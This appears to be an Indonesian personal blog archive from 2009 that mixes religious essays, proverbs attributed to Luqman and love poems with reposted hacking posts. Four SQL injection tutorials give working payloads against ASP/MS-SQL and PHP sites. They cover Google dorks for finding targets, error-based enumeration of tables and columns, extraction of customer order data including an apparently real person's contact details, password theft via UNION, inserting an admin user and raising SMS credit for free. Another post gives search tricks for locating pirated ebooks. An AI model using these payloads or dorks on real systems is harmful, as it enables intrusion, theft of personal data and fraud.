Lakune Ilmu Kudu Ketemu

Lakune Ilmu Kudu ketemu

2009-05-09T01:41:00.000-07:00

Lakune Ilmu Kudu ketemu

Adalah istilah jawa yang kalau di translate ke bahasa indonesia kurang lebih artinya "Jalannya ilmu harus ketemu", maksudnya kemanapun ilmu itu harus kita kejar supaya kita mendapatkannya. Jadi ilmu itu harus kita kejar walaupun jauh tempatnya. Sebab dengan ilmu semua akan mudah. Pekerjaan yang tidak dilandasi oleh ilmu maka hasilnya akan berantakan, tidak tersusun secara rapi. Lalu apa kehebatan ilmu...?
"Ilmu Itu Dapat Menjaga Pemiliknya, Sedangkan Harta hanya minta dijaga pemiliknya" Begitulah kata pepatah. kenapa ilmu disebut bisa menjaga pemiliknya. Misalnya kita memiliki ilmu berenang, saat kita naik kapal ditengah laut dan tiba-tiba kapal yang kita tumpangi tenggelam, lalu samakah orang yang punya ilmu berenang dengan yang tidak..? Pastinya tidak sama, orang yang punya ilmu berenang InsyaAlloh dapat selamat dengan ilmu yang dimilikinya, sedangkan orang yang tidak punya ilmu berenang pasti akan kesulitan, meskipun akhirnya selamat. Wallohu'alam kalau masalah kematian memang sudah ditangan Alloh. Tapi paling tidak ilmu renang dapat menjaga seorang yang memilikinya disaat dibutuhkan.
Berbeda dengan harta yang hanya minta dijaga pemiliknya, coba kita kalau punya motor pasti motor kita akan selalu kita jaga. Misalnya motor kita mau dicuri orang, pasti kita akan melawan bukan..? dan setelah diambil orang maka benda pasti akan hilang. Berbeda dengan ilmu yang meskipun diambil sana sini oleh orang banyak, insyaAlloh kita masih memilikinya, malahan ilmu itu bisa bermanfaat kalau kita amalkan kepada orang lain. Dan malah akan bertambah.
Jadi pesan Rasulullah SAW. "Carilah Ilmu Walau Sampai Negeri Cina" itu harus kita lakukan. sama seperti halnya dengan "Lakune Ilmu Kudu ketemu".

25 Pesan Luqmanul Hakim

2009-05-09T01:00:00.000-07:00

.. Hai anakku: ketahuilah, sesungguhnya dunia ini bagaikan lautan yang dalam, banyak manusia yang karam ke dalamnya. Bila engkau ingin selamat, agar jangan karam, layarilah lautan itu dengan SAMPAN yang bernama TAKWA, ISInya ialah IMAN dan LAYARnya adalah TAWAKKAL kepada ALLAH.
.. Orang - orang yg sentiasa menyediakan dirinya untuk menerima nasihat, maka dirinya akan mendapat penjagaan dari ALLAH. Orang yang insyaf dan sadar setalah menerima nasihat orang lain, dia akan sentiasa menerima kemulian dari ALLAH juga.
.. Hai anakku; orang yang merasa dirinya hina dan rendah diri dalam beribadat dan taat kepada ALLAH, maka dia tawadduk kepada ALLAH, dia akan lebih dekat kepada ALLAH dan selalu berusaha menghindarkan maksiat kepada ALLAH.
.. Hai anakku; seandainya ibu bapamu marah kepadamu kerana kesilapan yang dilakukanmu, maka marahnya ibu bapamu adalah bagaikan baja bagi tanam tanaman.
.. Jauhkan dirimu dari berhutang, karena sesungguhnya berhutang itu boleh menjadikan dirimu hina di waktu siang dan gelisah di waktu malam.
.. Dan selalulah berharap kepada ALLAH tentang sesuatu yang menyebabkan untuk tidak menderhakai ALLAH. Takutlah kepada ALLAH dengan sebenar benar takut ( takwa ), tentulah engkau akan terlepas dari sifat berputus asa dari rahmat ALLAH.
.. Hai anakku; seorang pendusta akan lekas hilang air mukanya karena tidak dipercayai orang dan seorang yang telah rusak akhlaknya akan sentiasa banyak melamunkan hal hal yang tidak benar. Ketahuilah, memindahkan batu besar dari tempatnya semula itu lebih mudah daripada memberi pengertian kepada orang yang tidak mau mengerti.
.. Hai anakku; engkau telah merasakan betapa beratnya mengangkat batu besar dan besi yang amat berat, tetapi akan lebih berat lagi daripada semua itu, adalah bilamana engkau mempunyai tetangga yang jahat.
.. Hai anakku; janganlah engkau mengirimkan orang yg bodoh sebagai utusan. Maka bila tidak ada orang yang cerdik, sebaiknya dirimulah saja yang layak menjadi utusan.
.. Jauhilah bersifat dusta, sebab dusta itu mudah dilakukan, bagaikan memakan daging burung, padahal sedikit saja berdusta itu telah memberikan akibat yang berbahaya.
.. Hai anakku; bila engkau mempunyai dua pilihan, takziah orang mati atau hadir majlis perkarwinan, pilihlah untuk menziarahi orang mati, sebab ianya akan mengingatkanmu kepada kampung akhirat sedang kan menghadiri pesta perkarwinan hanya mengingatkan dirimu kepada kesenangan duniawi saja.
.. Janganlah engkau makan sampai kenyang yang berlebihan, karena sesungguhnya makan yang terlalu kenyang itu adalah lebih baiknya bila makanan itu diberikan kepada anjing saja.
.. Hai anakku; janganlah engkau langsung menelan saja karena manisnya barang dan janganlah langsung memuntahkan saja pahitnya sesuatu barang itu, kerana manis belum tentu menimbulkan kesegaran dan pahit itu belum tentu menimbulkan kesengsaraan.
.. Makanlah makananmu bersama sama dengan orang orang yang takwa dan musyawarahlah urusanmu dengan para alim ulama dengan cara meminta nasihat dari mereka.
.. Hai anakku; bukanlah satu kebaikan namanya bilamana engkau selalu mencari ilmu tetapi engkau tidak pernah mengamalkannya. Hal itu tidak ubah bagaikan orang yg mencari kayu bakar, maka setelah banyak ia tidak mampu memikulnya, padahal ia masih mau menambahkannya.
.. Hai anakku; bilamana engkau mau mencari kawan sejati, maka ujilah terlebih dahulu dengan berpura pura membuat dia marah. Bilamana dalam kemarahan itu dia masih berusaha menginsyafkan kamu, maka bolehlah engkau mengambil dia sebagai kawan. Bila tidak demikian, maka berhati hatilah.
.. Selalulah baik tutur kata dan halus budi bahasamu serta manis wajahmu, dengan demikian engkau akan disukai orang melebihi sukanya seseorang terhadap orang lain yang pernah memberikan barang yang berharga.
.. Hai anakku; bila engkau berteman, tempatkanlah dirimu padanya sebagai orang yang tidak mengharapkan sesuatu daripadanya. Namun biarkanlah dia yang mengharapkan sesuatu darimu.
.. Jadikanlah dirimu dalam segala tingkah laku sebagai orang yang tidak ingin menerima pujian atau mengharap sanjungan orang lain karena itu adalah sifat riya' yang akan mendatangkan cela pada dirimu.
.. Hai anakku; janganlah engkau condong kepada urusan dunia dan hatimu selalu disusahkan olah dunia saja karena engkau diciptakan ALLAH bukanlah untuk dunia saja. Sesungguhnya tiada makhluk yang lebih hina daripada orang yang terpedaya dengan dunianya.
.. Hai anakku; usahakanlah agar mulutmu jangan mengeluarkan kata kata yang busuk dan kotor serta kasar, karena engkau akan lebih selamat bila berdiam diri. Kalau berbicara, usahakanlah agar bicaramu mendatangkan manfaat bagi orang lain.
.. Hai anakku; janganlah engkau mudah ketawa kalau bukan karena sesuatu yang menggelikan, janganlah engkau berjalan tanpa tujuan yang pasti, janganlah engkau bertanya sesuatu yang tidak ada guna bagimu, janganlah mensia-siakan hartamu.
.. Barang siapa yang penyayang tentu akan disayangi, siapa yang pendiam akan selamat daripada berkata yang mengandungi racun, dan siapa yang tidak dapat menahan lidahnya dari berkata kotor tentu akan menyesal.
.. Hai anakku; bergaullah rapat dengan orang yang alim lagi berilmu. Perhatikanlah kata nasihatnya karena sesungguhnya sejuklah hati ini mendengarkan nasihatnya, hiduplah hati ini dengan cahaya hikmah dari mutiara kata katanya bagaikan tanah yang subur lalu disirami air hujan.
.. Hai anakku; ambillah harta dunia sekedar keperluanmu saja, dan nafkahkanlah yang selebihnya untuk bekal akhiratmu. Jangan engkau tendang dunia ini ke keranjang atau bakul sampah karena nanti engkau akan menjadi pengemis yang membuat beban orang lain. Sebaliknya janganlah engkau peluk dunia ini serta meneguk habis airnya karena sesungguhnya yang engkau makan dan pakai itu adalah tanah belaka. Janganlah engkau bertemankan dengan orang yang bersifat dua muka, kelak akan membinasakan dirimu.

Using Google for searching ebooks

2009-05-08T18:40:00.000-07:00

Google has some fantastic potential for you to find whatever you are after on the internet.

To search for a book / program / file perhaps try the following.

Go to Google's search page and use the following criteria in the search dialog

intitle:index.of? file extension Name of item

e.g. intitle:index.of? chm syngress

This will hopefully give you a listing of all websites that google has cached that contain references to files in CHM format that are published by SYNGRESS.

---------------
I use in Google

+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +syngress

or

allinurl: +(rar|chm|zip|pdf|tgz) Syngress
Enjoy

Kembalikan Aku ke Masa Lalu

2009-05-07T23:36:00.000-07:00

Jikalau Harus Memilih
Aku Akan Memilih
Tapi Sayang Waktu dak Bisa Diputar
Seperti Dalam Film Lorong Waktu

Jikalau Harus Memilih
Aku Kan Memilih Kembali Hidup Pada Masa Kecil
Yang Mana Saat Itu Tak Mengenal Arti Dari Cinta
Yang Kukenal Hanya Bersenang-senang Dengan Teman-teman

Namun Setelah Kumengerti Tentang Cinta
Hidupku Semakin Tak menentu
Kadang Semangat Menjalani Hidup Dapat Membara Dengan Cinta
Tak Jarang Semangat Menurun Drastis Karena Cinta

Wahai Dzat Yang Membolak-Balikkan Hati
Tetapkanlah Hatiku Pada Jalan-Mu
Sehingga Aku Berjalan Dengan Ridho-Mu
Dan Pasti Aku dapat Melalui Rintangan Seberat Apapun Dengan Seizin-Mu...

Jika Aku Bisa memilih
Aku Kan Kembali Ke Masa Lalu
Dan Akan Tumbuh Berkembang Sampai Dewasa
Tanpa Mengenal Cinta
Sampai Pada Akhirnya Cinta Yang Datang Menjemputku
Dengan Halus Dan Tanpa Melukai Sedikitpun....

Kasih Sayang Yang Terlewatkan

2009-05-07T23:16:00.000-07:00

Disaat Aku Mulai Rapuh menjalani Hidup Ini
Kau Datang Dengan membawa Secercah Harapan Untukku
Sampai Akhirnya Kerapuhanku Sedikit Sedikit Mulai Tertutupi
Dan Kau Pun Terus Memberikan Aku Semangat Dalam Menjalani Hidup Ini

Ketika Aku Sudah Terlanjur Menyayangimu Dengan Sepenuh Hati
Tanpa Mengharapkan Balasan Kasih Sayang Darimu
Dan Tak Bermaksud Pula Ingin Memasuki kehidupanmu Yang Kau Jalani
Serta Tak Bermaksud Membuatmu Agar Menyayangiku

Yang Kuingin Adalah Ku Bisa Dekat Denganmu
Dimanapun Engkau Berada
Karena Jika Dekat Denganmu Hatiku Akan Terasa Tenang
Dan Jiwaku Pun Akan Terasa Damai

Tapi Entah mengapa...
Engkau Malah Semakin Menjauh Dariku
Seakan Engkau Tak mau Lagi Walau Hanya Berteman Denganku
Dirimu Seperti Tak Ingin Berada Dekat Denganku
Dan Akupun Berusaha Mencari Tahu Apakah Sebabnya
Tapi Kau Tak Pernah Mau Berbicara Denganku

Mungkin Inilah Yang Dinamakan Takdir
Kau Datang Dan Mungkin Sebentar Lagi Akan Pergi Meninggalkanku
Dengan Segala Kenangan Yang Aku Miliki
Dan Segala Masa Lalu Kelam mu Bersamaku

Tapi Sungguh Aku Tak Mengharapkan Apa-apa Darimu
Meskipun Hanya Setitik Cintamu Padaku
Aku Tak Pernah Berfikir Mengharapkan Seperti Itu
Yang Ku Ingin Hanya Ku Dapat Dekat Denganmu Dan Menjagamu Sepenuh Hatiku

Sampai Akhirnya Aku Tak Mampu Lagi Menjagamu.......

SQL Injection 3

2009-05-04T01:12:00.000-07:00

berikut adalah lanjutan dari v.2 Sql Injection dimana kesemuanya hanya berpengaruh pada mesin yg menjalankan web ASP + MS-SQL ....

dan inget penulis tidak bertanggung jawab atas segala kemungkinan yg terjadi hehehe

Target sample : http://www.xxx/qshop/details.asp?prodid=93

The Process :

cari tau vulner atau engga dengan cara menambahkan single quote ato having 1=1—

Contoh : http://www.xxx/qshop/details.asp?prodid=93’ atau http://www.xxx/qshop/details.asp?prodid=93 having 1=1--

kalau errornya MS-SQL bla bla bla berarti vulner, selain itu tidak vulner.

Contoh dari hasil di atas :

http://www.xxx/qshop/details.asp?prodid=93’

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/qshop/details.asp, line 23

hasil di atas itu menandakan web sample kita itu vulner, dan langkah selanjutnya adalah mencari tau struktur databasenya…..Database terdiri dari table n field. Field apa, table apa?....Field itu kolom2 yg memuat data2 dari input, n Table itu gabungan dari field2 yg sama. Dalam database ada primary key dalam setiap tablenya. (CMIIW)
Gmn cari taunya? Rumus buat nyari table structure n fields :

Cari Table :

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20

table_name%20not%20in%20(‘x')))--sp_password

X didalam tanda kurung itu adalah nama table yg akan keluar dan di insert lagi. Penjelasannya ada dibawah

Cari Field :

%20or%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=

('X')%20and%20column_name%20not%20in%20('Y')))--sp_password

X itu nama tablenya

Y itu nama fieldnya

udah tau rumusnya? Ok INGET itu rumus….mulai kita hajar web sample. Kita tambahin having di akhiran VALUEnya….jadi :

http://www.xxx/qshop/details.asp?prodid=93%20having%201=1--

en keluar errornya :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'products.Id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/qshop/details.asp, line 23

OK dari error itu kita tau ada table dengan nama Product dan di dalam table product ada field ID.

ok, kita cari table dengan isi yg kita inginkan.....how? inget rumus di atas....

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20

in%20(‘x')))--sp_password

Sekarang X kita ganti dengan Products. Jadinya

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name

%20not%20in%20('Products')))--sp_password

Trus kita masukin rumus itu di belakang value products

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20 not%20in%20('Products')))--sp_password

and keluar error :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Carts' to a column of data type int.

/qshop/details.asp, line 23

Nah ada lagi table dengan nama Carts…got it…cari trus sampe abis….kita tambahin aja value x-nya, jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20not%20in%20('Products','Carts')))--sp_password

abis itu bakal keluar error dengan nama table yg laen…..masukin trus nama2 table itu kyk contoh di atas. Masukin terus sampe errornya gak ada ato errornya beda.

Akhirannya jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20not%20in%20('carts','Categories','CommonList','Config_Table','dbstatus',

'dtproperties','Historic','OrderLines','Orders','Products','Status','sysconstraints','syssegments','test','Users')))--sp_password

OK semua struktur tablenya kita tau,,,,,ada table orders….kl menurut logika cc itu berarti disimpen di table orders….ok kita cari tau table orders punya field apa aja?...Inget rumus field di atas? Klo gak inget minum mizone dolO!

%20or%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name

=('X')%20and%20column_name%20not%20in%20('Y')))--sp_password

X kita ganti dengan nama table yg akan kita cari field2nya….jadi kita ganti Orders

Y kita kosongin aja dolo tar jg keluar field pertamanya.....jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('')))--sp_password

errornya jadi :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Id' to a column of data type int.

/qshop/details.asp, line 23

Nah ID itu adalah field pertama dari table orders, artinya kita dapet nilai Y....selanjutnya kita ganti Y jadi ID menjadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('Id')))--sp_password

nah tar terus keluar error yg sama persis kyk waktu kita ngeluarin struktur table…trus masukin lagi field2 table order ke dalam nilai Y sampe errornya gak ada lagi atao beda jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('Id','UserID','CartID','Date',

'Name','Surname','Country2','Address','CP','City','Province','Country','Phone','mail','DName','DAddress','DCP','DCity','DProvince',

'DActualCountry','DPhone','PaymentMode','SubTotal','Delivery','Total','Status')))--sp_password

OK, struktur table n field dah tau…sekarang gmn caranya kita bisa ngambil nilai dari database? Dalam contoh ini kita ambil info dari database tanpa masuk ke admin. RUMUS lagi :

%20or%201=convert(int,(select%20top%201%20convert(varchar,isnull(convert(varchar,%20Y1),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Y),'NULL'))% 20from%20X%20where%20Y1%20not%20in%20('Z')))--sp_password

Ok Y1 itu nilai Primary Key, contoh primary key itu ID, OrderID, UserID dll….

Y itu Field lainnya dalam table yg akan di keluarin nilai fieldnya.

X itu Table Name yg akan di ambil data2nya

Z itu nilai dari Y1 bisa jadi 0,1,2,3,4…dst;….

Contoh dari sample :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20convert(varchar,isnull(convert(varchar,%20id),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20date),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20UserID),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Name),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Surname),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Address),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20CP),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20City),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Province),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Country),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Phone),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20mail),'NULL'))%20from%20orders%20where%20id%20not%20in%20('2918')

%20order%20by%20id%20desc))--sp_password

darimana dapet nilai value Y1 ? masukin aja asal dulu misalkan 0, nanti di error yg akan keluar dikasih liat nilai Valuenya, biasanya di awal contoh :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '3011/Dec 23 2006 2:19PM/L9180ER/Britain/Brady/The Department of Politics, Un/YO10 5DD/York/Please Select/UK/07939086210/ brady.britain@gmail.com / ' to a column of data type int.

/qshop/details.asp, line 23

3011 itu nilai dari Primary Key atau Y1…..

Selesai….sql injection gak Cuma berefek di MS-SQL tapi jg di semua SQL…Cuma metodenya beda2….tunggu saja rilisan berikutnya ;)

sumber : http://www.neoteker.or.id/info-security/60-sql-injection-v3.html

SQL Injection 2

2009-05-04T01:10:00.000-07:00

:::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln engganya tuh situs kita ketikan ' having 1=1-- di input box atau URL error tadi , contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table Users, stringnya : ' group by UserID --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini stringnya adalah ' group by field1,field2 --
contoh : ' group by UserID,ClientName --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai semua field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :) apabila sudah lama melakukan looping dan akhirnya ketika group terakhir kita lakukan dan tidak keluar error messagesnya maka error yang terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali, tergantung admin yang masangnya jadi susah kalau maen teabk2an ajah....contoh field yang pernah gw temuin :
' group by UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
, OperatingSystem, PrefferredGraphi cFormat -- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari siapa aja user yang ada dalam table Users dan kolom UserName... caranya? kita pake Union apa itu UNION??? union adalah perintah SQL dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen gunain Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah kalau begitu kita masukin syntax sql union untuk melihat username :
' union select min(UserName) ,1,1,1 from Users where username > 'a'-- jadi hasilnya : select * from Users where UserName ==' union select min(UserName) ,1,1,1 from Users where username > 'a'--and Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error messages lagi yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake string union tadi nanti akan muncul username2 lain....lalu bagaimana dengan passwordnya? ??
ok union beraksi kembali : ' union select min (UserName),1, 1,1,1,1,1, 1,1 from Users where username > 'Agile'-- lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. .... caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,' a@a.com ',1)-- >> artinya kita masukan id kita dalam urutan 0, lalu username 'lucifer', password 'lucifer' Fname (frontName) itu 'lu', Lname(LastName) sebagai 'cid', dan EmailAddress ' a@a.com '...... coba kita login dengan user buatan kita tadi....BINGO! selamat anda berhasil menjebol database situs

sumber : http://www.neoteker.or.id/info-security/58-sql-injection-vol2.html

SQL Injection 1

2009-05-04T01:05:00.001-07:00

Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe untuk menginject sql ini anda perlu memperhatikan input-inputan dalam situs itu yang sekiranya connect dengan SQL database situs itu, atau bisa juga dengan menambah dari link url di kotak browser anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari target yang vuln seperti kondisi diatas anda perlu mencarinya yang .asp nah seperti biasa....GOOGLING! !! hehehe key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa jauh anda kreatif dalam mencari target di google.nah, kanre disini gw bahas cara inject ke situs web to sms so searchnya : asp,web to sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan yang masuk ke database itu ga, misalnya search product, member login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya connect ke database situs itu, contoh isa di login, member, search, dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject, kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi dungs? ok kita loop lagi sekarang kita inject : ' group by UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini kita gunain perintah group by untuk menggroup kolom ingin kita lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe penerapan selanjutanya adalah misal situs itu adalah situs pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms dari web, namun harus ada account yang digunakan untuk mengirim sms itu, jadi account itu harus ada nilainya dan untuk itu kita harus mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe so kita inject aja....sebelumnya kita harus jadi member kan gratis ini daftarnya... setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log ke situs itu dengan id kita, cari tahu string khusus yang digunakan web itu untuk menghitung account sms kita, misalnya : cell nah, inilah injectnya... .cari login inputan lagi misal /member.asp nah disitu ada input box id dan pass...kita Inject dengan :

' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]= '[char_id]'- -

contoh :

' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)

sep, nah klo muncul error : userid not found kita isa cari input di forgot password : dengan inputan sama...jreeen ketika di jalankan ga ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES BRO!!! :)

sumber : http://www.neoteker.or.id/info-security/59-sql-injection-vol1.html

How To SQL Injection

2009-05-04T01:01:00.000-07:00

SQL Injection adalah salah satu metode yang dilakukan untuk mengeksploitasi kelemahan pada koding halaman web. Apa aja yg bisa diperoleh dari metode ini? Buaannnnyaakkk, misal menampilkan username + password user/member dari suatu situs, insert data pada database, n dll. OK, langsung kita praktekan saja

1. Cek kelemahan web
Kalo yg pernah/sering bikin web, pasti tau beda antara METHOD GET n POST. Method GET akan menampilkan parameter inputan pada URL di address bar. Hal ini kadang yg menjadikan ktia dapat mengetahui isi dari parameter yang di pass ke web serverna. Misal :

http://www.target.com/apaajah.php?news=32

Dari URL web tsb kita bisa liat kalo parameter news akan di pass ke web server dgn nilai 32. Jika pada koding halaman apaajah.php terdapat Query SQL seperti ini :

$news = $_GET['news'];
$hasil = mysql_query("SELECT nama_field FROM nama_tabel WHERE news_id = $news ");

Maka akan dipastikan kalo hasil dari query tersebut akan menampilkan field dgn kondisi news_id = 32, jika news_id yg dicari tidak ada, maka akan menghasilkan error. Error ini lah yang menjadi tanda kalo tidak adana pengecekan terhadap nilai parameter yang salah atau invalid. Kalo kita beginikan pada URL gimana :

http://www.target.com/apaajah.php?news=-1

Maka akan muncul error pada web yg bersangkutan bila tipe data news_id harus positif Tyus hubunganna ma SQL Injection gimana? Jika tidak ada pengecekan terhadap nilai paramater, maka kita bisa menambah/mengurangi nilai tsb. Misal :

http://www.target.com/apaajah.php?news=32 AND 1=0--

Ada tambahan string pada URL tsb, yaitu "AND 1=0--", Apa artina? string tsb adalah operator logika BOOLEAN, dimana Query SQL yang akan diproses pada koding web tsb akan berubah. Tadina hanya mencari news_id dengan nilai 32 saja, akan berubah menjadi "tampilkan nama_field dengan news_id = 32 DAN 1=0". Dalam logika, 1 TIDAK SAMA DENGAN 0, maka 1=0 bernilai FALSE (syntax -- akan mengakhiri Query SQL walaupun masih ada Query SQL dibelakangna). Hasil dari query SQL tsb akan tidak menampilkan apa2, karena kondisi bernilai FALSE. Bila hal ini terjadi maka halaman apaajah.php pada web tsb BERPOTENSI untuk dilancarkan serangan SQL Inejction

2. Mencari jumlah kolom/field pada tabel
